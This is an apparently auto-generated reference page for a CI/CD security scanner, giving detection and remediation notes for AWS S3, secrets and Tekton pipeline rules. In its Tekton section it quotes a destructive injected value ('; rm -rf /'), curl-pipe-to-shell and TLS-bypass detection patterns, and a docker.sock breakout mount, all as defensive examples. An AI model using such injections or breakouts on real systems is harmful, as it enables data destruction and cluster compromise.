How this is detected. Default bucket encryption applies SSE-S3 (AES256) to every PutObject. As of January 2023, AWS enables this on all new buckets automatically, but existing buckets created before then can still be unencrypted unless explicitly configured. Without it, individual objects can be uploaded without encryption (the client gets to choose).
Recommendation. Enable default bucket encryption using at minimum AES256 (SSE-S3). For stronger key control, use SSE-KMS with a customer-managed key.
Source: S3-002 in the AWS provider.
S3-003: Artifact bucket versioning not enabled MEDIUM
Evidences: AU-9 Protection of Audit Information, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Versioning makes overwrites and deletes recoverable: the previous content of an object survives until lifecycle expires it. Without versioning, an artifact overwrite (a bad pipeline run, a malicious replacement, a typo'd aws s3 cp) is unrecoverable, the original bytes are gone.
Recommendation. Enable S3 versioning on the artifact bucket so that previous artifact versions are retained and rollback is possible. Combine with a lifecycle rule to expire old versions after a retention period.
Source: S3-003 in the AWS provider.
S3-004: Artifact bucket access logging not enabled LOW
Evidences: AU-2 Event Logging, AU-12 Audit Record Generation.
How this is detected. S3 server access logging records every API operation against the bucket, who, when, what object, what method. CloudTrail data events overlap but cost more; access logs are the cheap baseline. Without them, an exfiltration via GetObject doesn't leave a trail you can investigate.
Recommendation. Enable S3 server access logging for the artifact bucket and direct logs to a separate, centralized logging bucket with restricted write access.
Source: S3-004 in the AWS provider.
S3-005: Artifact bucket missing aws:SecureTransport deny MEDIUM
Evidences: AU-9 Protection of Audit Information, SC-8 Transmission Confidentiality and Integrity.
How this is detected. S3 endpoints accept HTTP and HTTPS by default. Without an explicit Deny on aws:SecureTransport=false, a plaintext request, typically from a misconfigured client or a SDK with a stale endpoint, is honored if signed. The bucket policy Deny is the only enforcement; no account-level switch covers it.
Recommendation. Add a Deny statement for s3:* with Bool aws:SecureTransport=false.
Source: S3-005 in the AWS provider.
SIGN-001: No AWS Signer profile defined for Lambda deploys MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. AWS Signer profiles are the upstream of LMB-001's code-signing config. Without a profile defined, no function in the account can enforce code-signing, LMB-001's recommendation has nothing to point at. The profile is the foundation; the per-function code-signing config attaches it.
Recommendation. Create an AWS Signer profile with platform AWSLambda-SHA384-ECDSA and reference it from every Lambda code-signing config used by the pipeline. Without a profile, LMB-001 remediation isn't possible and release artifacts can't be signed at build time.
Source: SIGN-001 in the AWS provider.
SIGN-002: AWS Signer profile is revoked or inactive HIGH
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. A revoked or canceled Signer profile invalidates every signature it ever produced. Lambda functions configured to enforce code-signing fail to deploy until the profile is replaced (or, if UntrustedArtifactOnDeployment = Warn, deploy with a CloudWatch warning the operator rarely reads).
Recommendation. Rotate the signing profile: create a replacement and update every code-signing config that references the revoked profile. A revoked or canceled profile invalidates every signature it produced, lambdas relying on it will fail verification.
Source: SIGN-002 in the AWS provider.
SM-001: Secrets Manager secret has no rotation configured HIGH
Evidences: IA-5 Authenticator Management, SC-12 Cryptographic Key Establishment and Management.
How this is detected. Only secrets actually referenced by CodeBuild are checked, secrets used purely by application workloads are out of scope for a CI/CD scanner.
Recommendation. Enable automatic rotation on every Secrets Manager secret referenced by a CodeBuild project or CodePipeline. Unrotated secrets persist indefinitely, so a single leak (e.g. a build log that echoed the value) compromises the secret for its full lifetime.
Source: SM-001 in the AWS provider.
SM-002: Secrets Manager resource policy allows wildcard principal CRITICAL
Evidences: AC-3 Access Enforcement, SC-7 Boundary Protection.
How this is detected. A wildcard-principal Allow on a Secrets Manager resource policy means any principal in any AWS account can call GetSecretValue (subject to conditions, if any). Always combine with at least aws:SourceAccount or aws:PrincipalOrgID, the lift-and-shift cross-account secret-access pattern needs scoping.
Recommendation. Remove Allow statements whose Principal is * from every Secrets Manager resource policy, or scope them with a Condition restricting the source account/org (aws:PrincipalOrgID). A wildcard-principal policy allows any AWS account to call GetSecretValue on the secret.
Source: SM-002 in the AWS provider.
SSM-001: SSM Parameter with secret-like name is not a SecureString HIGH
Evidences: IA-5 Authenticator Management.
How this is detected. An SSM String parameter is plaintext at rest and at API; ssm:GetParameter without any KMS Decrypt authority returns the value. SecureString adds KMS-encryption + the WithDecryption=true flag (which forces an explicit KMS authorization step). Secret-named parameters (TOKEN, PASSWORD, KEY) are almost always intended to be SecureString and rarely should not be.
Recommendation. Recreate the parameter with Type=SecureString and migrate consumers to the new name if needed. Plain String parameters are visible via ssm:GetParameter without any KMS authorization.
Source: SSM-001 in the AWS provider.
SSM-002: SSM SecureString uses the default AWS-managed key MEDIUM
Evidences: SC-12 Cryptographic Key Establishment and Management, SC-13 Cryptographic Protection.
How this is detected. alias/aws/ssm is the AWS-managed default for SecureString. Its key policy is fixed and account-wide. A customer-managed key gives you the same per-parameter key-policy + CloudTrail audit story you'd apply to Secrets Manager (which always uses a CMK).
Recommendation. Recreate SecureString parameters with KeyId pointing at a customer-managed KMS key. The default alias/aws/ssm key is shared across the account and its key policy cannot be audited or scoped per parameter.
Source: SSM-002 in the AWS provider.
TKN-001: Tekton step image not pinned to a digest HIGH
Evidences: SI-2 Flaw Remediation, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Applies to Task and ClusterTask kinds. The image must contain @sha256: followed by a 64-char hex digest. Any tag-only reference, including :latest, fails.
Recommendation. Pin every step image to a content-addressable digest (gcr.io/tekton-releases/git-init@sha256:<digest>). Tag-only references (alpine:3.18) and rolling tags (alpine:latest) let a compromised registry update redirect the step at the next pull, with no audit trail in the Task manifest.
Source: TKN-001 in the Tekton provider.
TKN-002: Tekton step runs privileged or as root HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. Detection fires on a step with securityContext.privileged: true, securityContext.runAsUser: 0, securityContext.runAsNonRoot: false, securityContext.allowPrivilegeEscalation: true, or no securityContext block at all.
Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every step. A privileged step shares the node's kernel namespaces; a malicious or compromised step image then has root on the build node, breaking the boundary between build and cluster.
Source: TKN-002 in the Tekton provider.
TKN-003: Tekton param interpolated unsafely in step script CRITICAL
Evidences: CM-6 Configuration Settings, SA-11 Developer Testing and Evaluation.
How this is detected. Fires on any $(params.X) or $(workspaces.X.path) token inside a script: body that isn't already wrapped in double quotes ("$(params.X)"). Doesn't fire on the env-var indirection pattern, which is safe.
Recommendation. Don't interpolate $(params.<name>) directly into the step script:. Tekton substitutes the value before the shell parses it, so a parameter containing ; rm -rf / runs as shell. Receive the parameter through env: (valueFrom: ... or value: $(params.<name>)) and reference the env var quoted in the script ("$NAME"); or pass it as a positional argument to a shell function.
Source: TKN-003 in the Tekton provider.
TKN-004: Tekton Task mounts hostPath or shares host namespaces CRITICAL
Evidences: AC-6 Least Privilege, SC-7 Boundary Protection, SI-7 Software, Firmware, and Information Integrity.
How this is detected. Checks spec.volumes[].hostPath (legacy v1beta1 form), spec.workspaces[].volumeClaimTemplate.spec.storageClassName == 'hostpath', and spec.podTemplate host-namespace flags.
Recommendation. Use Tekton workspaces: backed by emptyDir or persistentVolumeClaim instead of hostPath. Drop hostNetwork: true / hostPID: true / hostIPC: true on the Task's podTemplate. A hostPath mount of /var/run/docker.sock or / lets the build break out of the pod and act as the underlying node.
Source: TKN-004 in the Tekton provider.
TKN-005: Literal secret value in Tekton step env or param default CRITICAL 🔧 fix
Evidences: IA-5 Authenticator Management, SC-28 Protection of Information at Rest.
How this is detected. Strong matches: AWS access keys, GitHub PATs, JWTs. Weak match: env var name suggests a secret (*_TOKEN, *_KEY, *PASSWORD, *SECRET) and the value is a non-empty literal rather than a $(params.X) / valueFrom reference.
Recommendation. Mount secrets via env.valueFrom.secretKeyRef (or a volumes: Secret mount) instead of writing the value into env.value or params[].default. Task manifests are committed to git and cluster-readable; literal values leak through normal access paths.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: TKN-005 in the Tekton provider.
TKN-006: Tekton run lacks an explicit timeout LOW
Evidences: AU-2 Event Logging, SI-2 Flaw Remediation.
How this is detected. Applies to PipelineRun, TaskRun, and Pipeline. For Pipelines, the rule looks for spec.tasks[].timeout as evidence of intent. Task / ClusterTask themselves don't carry a timeout, the timeout lives on the concrete run.
Recommendation. Set spec.timeouts.pipeline (or spec.timeout on a TaskRun) on every PipelineRun and TaskRun. A misbehaving step otherwise pins a build pod for the cluster's default timeout (1h). For long jobs, set a generous explicit value (2h, 6h) rather than leaving it implicit.
Source: TKN-006 in the Tekton provider.
TKN-007: Tekton run uses the default ServiceAccount MEDIUM
Evidences: AC-2 Account Management, AC-6 Least Privilege.
How this is detected. An explicit serviceAccountName: default setting is treated the same as omission.
Recommendation. Set spec.serviceAccountName on every TaskRun and PipelineRun to a least-privilege ServiceAccount that carries only the secrets and RBAC the run actually needs. Falling back to the namespace's default SA grants access to whatever cluster-admin or wildcard role someone later binds to default, a privilege-escalation surface that should never be load-bearing for build pods.
Source: TKN-007 in the Tekton provider.
TKN-008: Tekton step script pipes remote install or disables TLS HIGH 🔧 fix
Evidences: SC-8 Transmission Confidentiality and Integrity, SI-7 Software, Firmware, and Information Integrity, SR-3 Supply Chain Controls and Processes, SR-11 Component Authenticity.
How this is detected. Uses the cross-provider CURL_PIPE_RE and TLS_BYPASS_RE regexes so detection is consistent with the GHA / GitLab / CircleCI / Cloud Build providers.
Recommendation. Replace curl ... | sh with a download-then-verify-then-execute pattern. Drop TLS-bypass flags (curl -k, git config http.sslverify false); install the missing CA into the step image instead. Both forms let an attacker controlling DNS / a transparent proxy substitute the script the step runs.
Autofix. pipeline_check --fix will patch this finding automatically. Review the diff before committing; the fixer applies the conservative remediation pattern (e.g. swap a floating tag for the digest it currently resolves to), not the most aggressive one.
Source: TKN-008 in the Tekton provider.
TKN-009: Artifacts not signed (no cosign/sigstore step) MEDIUM
Evidences: SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Detection mirrors GHA-006 / BK-009 / CC-006, the shared signing-token catalog (cosign, sigstore, slsa-github-generator, slsa-framework, notation-sign) is searched across every string in the Task / Pipeline document. The rule only fires on artifact-producing Tasks (those that invoke docker build / docker push / buildah / kaniko / helm upgrade / aws s3 sync / etc.) so lint-only Tasks don't trip it.
Recommendation. Add a signing step to the Task, either a dedicated cosign sign step after the build, or use the official cosign Tekton catalog Task as a referenced step. The Task should sign by digest (cosign sign --yes <repo>@sha256:<digest>) so a re-pushed tag can't bypass the signature.
Source: TKN-009 in the Tekton provider.
TKN-010: No SBOM generated for build artifacts MEDIUM
Evidences: CM-8 System Component Inventory, SR-4 Provenance.
How this is detected. An SBOM (CycloneDX or SPDX) records every component baked into the build. Without one, post-incident triage can't answer did this CVE ship? for a given artifact. Detection uses the shared SBOM-token catalog: syft, cyclonedx, cdxgen, spdx-tools, microsoft/sbom-tool. Fires only on artifact-producing Tasks.
Recommendation. Add an SBOM-generation step. syft <artifact> -o cyclonedx-json > $(workspaces.output.path)/sbom.json runs in the official syft Tekton catalog Task. cyclonedx-cli and cdxgen are alternatives. Publish the SBOM as a Workspace result so downstream Tasks can consume it.
Source: TKN-010 in the Tekton provider.
TKN-011: No SLSA provenance attestation produced MEDIUM
Evidences: CM-2 Baseline Configuration, SI-7 Software, Firmware, and Information Integrity, SR-4 Provenance.
How this is detected. Provenance generation is distinct from signing. A signed artifact proves who published it; a provenance attestation proves where / how it was built. Tekton Chains is the Tekton-native answer, once enabled on the cluster, every TaskRun's outputs are signed and attested without per-Task wiring. Detection uses the shared provenance-token catalog (slsa-framework, cosign attest, in-toto, attest-build-provenance, witness run). Tasks produced by tekton-chains pass on the cosign attest match.
Recommendation. After the build step, run cosign attest --predicate slsa.json --type slsaprovenance <ref> (or use the tekton-chains controller, which signs and attests every TaskRun automatically when configured). Publish the attestation alongside the artifact so consumers can verify how it was built, not just who signed it.
Source: TKN-011 in the Tekton provider.
TKN-012: No vulnerability scanning step MEDIUM
Evidences: RA-5 Vulnerability Monitoring and Scanning, SI-2 Flaw Remediation.
How this is detected. Vulnerability scanning sits at a different layer from signing and SBOM. It answers does this artifact ship a known CVE? rather than can we verify what it is?. Detection uses the shared vuln-scan-token catalog: trivy, grype, snyk, npm-audit, pip-audit, osv-scanner, govulncheck, anchore, codeql-action, semgrep, bandit, checkov, tfsec, dependency-check. Walks every Task / Pipeline / *Run document; passes if any document includes a scanner reference.
Recommendation. Add a vulnerability scanner step. trivy fs $(workspaces.src.path) for source / filesystem; trivy image <ref> for container images. The official Tekton catalog ships trivy-scanner and grype-scanner Tasks if you'd rather reference one. Fail the step on findings above a chosen severity so a regression blocks the merge instead of shipping.
Source: TKN-012 in the Tekton provider.
TKN-013: Tekton sidecar runs privileged or as root HIGH
Evidences: AC-6 Least Privilege, CM-7 Least Functionality.
How this is detected. TKN-002 hardens the spec.steps list. Tekton's spec.sidecars list runs alongside the steps in the same pod, but a sidecar's container image and command come from a separate place in the manifest, so a Task with hardened steps and a privileged sidecar (a common pattern when wrapping docker:dind) leaves the same kernel-namespace gap TKN-002 was meant to close. The detection mirrors TKN-002: fires on a sidecar with securityContext.privileged: true, runAsUser: 0, runAsNonRoot: false, allowPrivilegeEscalation: true, or no securityContext block at all.
Recommendation. Set securityContext.privileged: false, runAsNonRoot: true, and allowPrivilegeEscalation: false on every sidecar in spec.sidecars. A privileged sidecar is the same escape vector as a privileged step, it shares the pod's network and kernel namespaces, and a compromised sidecar image owns the entire TaskRun's execution surface.
Known false positives.
- Tasks that genuinely need
docker:dindas a sidecar, e.g. building images inside the cluster without giving the step itself host-Docker access. The replacement pattern is Kaniko or BuildKit running as the step itself, with no privileged sidecar; if neither is viable, ignore TKN-013 in.pipeline-check-ignore.ymlfor the affected Task.
Source: TKN-013 in the Tekton provider.
This page is generated. Edit pipeline_check/core/standards/data/nist_800_53.py (mappings) or scripts/gen_standards_docs.py (intro / per-control prose) and run python scripts/gen_standards_docs.py nist_800_53.